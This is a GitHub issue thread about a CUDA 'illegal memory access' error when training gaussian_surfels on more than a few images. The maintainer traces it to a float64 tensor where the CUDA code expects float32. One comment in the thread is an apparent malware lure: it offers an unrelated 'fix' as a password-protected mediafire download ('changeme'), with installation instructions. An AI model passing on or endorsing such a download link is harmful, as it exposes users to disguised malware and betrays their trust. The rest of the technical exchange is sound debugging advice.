### ISSUE TITLE
Illegal memory access CUDA

### ISSUE THREAD

**Issue by robofar** [turandai/gaussian_surfels#46]
Hello I have one weird issue I cannot solve. I have my dataloader and dataset. When I train for lets say 2 images everything is fine, but when I train for >5 images, I always get this error:

RuntimeError: CUDA error: an illegal memory access was encountered
CUDA kernel errors might be asynchronously reported at some other API call,so the stacktrace below might be incorrect.
For debugging consider passing CUDA_LAUNCH_BLOCKING=1.

If I write in terminal export CUDA_LAUNCH_BLOCKING=1 then I get error:
RuntimeError: CUDA error: an illegal memory access was encountered
and it reports there is some error in radii>1 in renderer file.
If I remove this radii>1 and just put some nonsense value like 1 then it reports same error on some other place. That's why I cannot figure it out what the error is.

Is it possible that reason is some cuda synchronization or out of memory (which would be weird if it is)?

Thanks

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by turandai** [comment]
Hi, when illegal cuda memory is accessed, the debugger output is often unreliable. Do you have same problem in the provided dataset? I may find the reason if I can reproduce your problem.

**Comment by robofar** [comment]
It seems issue was with that, some tensor was of type `float64` . When I changed to `float32` no error appeared. Do you maybe know why?

**Comment by turandai** [comment]
Oh yes, the data type compiled in cuda is float32, it will not changing with your input type. Inconsistency of datatype would cause illegal memory access. If neccessary to use float64, you may change the data type in cuda, but it might be a quite tricky. So float32 is recommended.

**Comment by robofar** [comment]
Thanks @YuePanEdward , it solved another issue besides `dtype` that I had.
